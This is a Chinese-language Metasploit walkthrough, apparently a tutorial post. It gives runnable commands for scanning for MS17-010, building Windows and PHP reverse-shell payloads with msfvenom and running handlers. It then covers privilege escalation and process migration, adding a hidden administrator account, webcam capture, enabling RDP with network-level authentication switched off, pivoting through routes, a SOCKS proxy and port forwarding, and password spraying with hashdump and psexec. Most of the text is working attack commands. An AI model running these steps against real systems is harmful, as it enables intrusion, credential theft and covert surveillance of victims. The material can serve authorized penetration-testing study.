MSF(Metasploit)是一个免费的、可下载的渗透测试框架,该框架集成了渗透测试全流程的渗透工具

目录

相对于Cobalt Strike而言,msf具备更全面的渗透相关模块,但是对于团队渗透来说效果

不是很好,现在版本的MSF已经将msfvenom木马生成和msfconsole控制台分离开来

msfvenom可以生成php jsp asp aspx iso elf 安卓等众多木马

永恒之蓝利用

查看模块这一条的id auxiliary/scanner/smb/smb_ms17_010

search ms17_010

使用该模块

use (上面的id)

查看该模块的配置

show options

设置该模块的配置

set RHOSTS (目标ip)

windows可执行反向连接小马

使用msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(本地地址) LPORT=(本地端口) -f exe >shell.exe

进入msf控制台

msfconsole

使用监听模块

use exploit/multi/handler 

将模块的监听模式配置为反向windows小马监听

set payload windows/meterpreter/reverse_tcp

设置本机地址

set lhost 192.168.10.143

设置本机端口

set lport 6666

开始监听

run

将木马放到受害机执行

PHP站点反向连接小马

使用msfvenom生成木马

msfvenom -p php/meterpreter_reverse_tcp LHOST=(本地地址) LPORT=(本地端口) -f raw > shell.php

进入msf控制台

msfconsole

使用监听模块

use exploit/multi/handler 

将模块的监听模式配置为反向PHP小马监听

set payload php/meterpreter_reverse_tcp

设置本机地址

set lhost 192.168.10.143

设置本机端口

set lport 6666

开始监听

run

将木马放到受害机站点访问

meterpreter

当你进入到这个视图时,说明你已经成功获取到受害机的一部分操作权限了

下面要进行的是权限维持和权限提升,msf已经为我们准了一些方法

因为在迁移进程时最多只能迁移到当前权限的进程,所以这里我们先提升一下权限

可以尝试以下命令

run post/multi/recon/local_exploit_suggester

getsystem

如果不能成功可以试着利用其他方式进行提权

当我们成功拿到最高权限时,可以去查看系统进程迁移过去防止木马进程被杀掉

查看win的进程

ps

迁移进程

migrate (uid)

meterpreter的一些命令

将meterpreter挂起在后台

background  

查看挂载在后台的进程

sessions

重新进入进程

sessions -i (id)

杀掉进程

sessions -k (id)

弹出cmd

shell

操作注册表

reg

缓解乱码情况

chcp 65001

列出远程桌面程序

enumdesktops

获取远程桌面

getdesktop

控制鼠标键盘

uictl

查看当前路径文件和路径

dir / ls

查看当前目录

pwd

创建文件

edit (文件名) 

创建目录

mkdir

删除目录

rmdir

复制文件

cp  (源位置) (目标地址)

移动文件

mv  (源位置) (目标地址)

上传文件

upload (攻击机文件路径) (受害机路径)

下载文件

download (受害机路径)

搜索文件

search -d c: -f "*".config

创建用户

net user tom 123456 /add

设为管理员组

net localgroup administrators tom /add

查看对方是否存在摄像头

webcam_list

利用摄像头拍照

webcam_snap

利用摄像头直播视频

webcam_stream

windows的远程桌面连接

开启win远程桌面连接

run post/windows/manage/enable_rdp

windows系统为了确保安全性在开启远程连接时默认会开启网络级身份认证,这会

导致攻击机无法成功连接到目标主机,我们可以通过修改注册表的方式关闭该选项

创建路径

reg createkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\CredSSP\\Parameters

关闭网络身份认证

reg setval -k "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp" -t REG_DWORD -w 32 -v UserAuthentication -d 0

进入linux命令行执行,全屏打开目标主机

rdesktop -f 192.168.1.112

隧道

使用msf成功控制一台主机时,可以探查内网存活主机并利用当前主机作为跳板

进入其内网,进一步扩大危害范围,msf为我们提供了打通隧道的几种方法

代理

进入meterpreter视图

探测有几张网卡

run get_local_subnets

在跳板机写一条受害机网段的路由

run autoroute -s 12.12.12.0/24

进入msf视图

bg

在msf添加一条路由

route add 12.12.12.0 255.255.255.0  1

查看路由

route print

开启win跳板的代理服务

use  auxiliary/server/socks_proxy

查看配置

show options    

运行

run

编辑攻击机kali配置文件

vim /etc/proxychains4.conf

最后面4改成5 监听端口 与msf视图show options的SRVPORT端口一致

现在攻击机kali使跳板机变成了一个进入其内网vpn的软件

用火狐测试连通性

proxychains firefox (受害机ip)

端口转发

进入meterpreter视图

为跳板机开启端口转发

portfwd add -L (本机ip) -l (本机端口) -p (目标机端口) -r (目标机ip)

查看转发列表

portfwd list

在攻击机kali命令行远程连接windows桌面

rdesktop (目标机ip):(目标机端口)    

不想再进行转发时 //———–清空列表———–//

portfwd flush

密码喷洒

需要要目标开启445 需要目标密码(hash或明文)

获取目标机哈希密码

hashdump

使用微软白名单连接工具psexec进行密码喷洒

use exploit/windows/smb/psexec

设置模块配置如下

SMBPass设置要喷洒的密码

SMBUser设置要登录的用户名

LPORT设置反弹回来的端口

通过psexec连接

PsExec.exe -accepteula \\(目标ip) -u (账号) -p (密码) -s cmd.e

注意:当使用密码喷洒时可能会记录事件到windows日志中去

NTML事件id–4776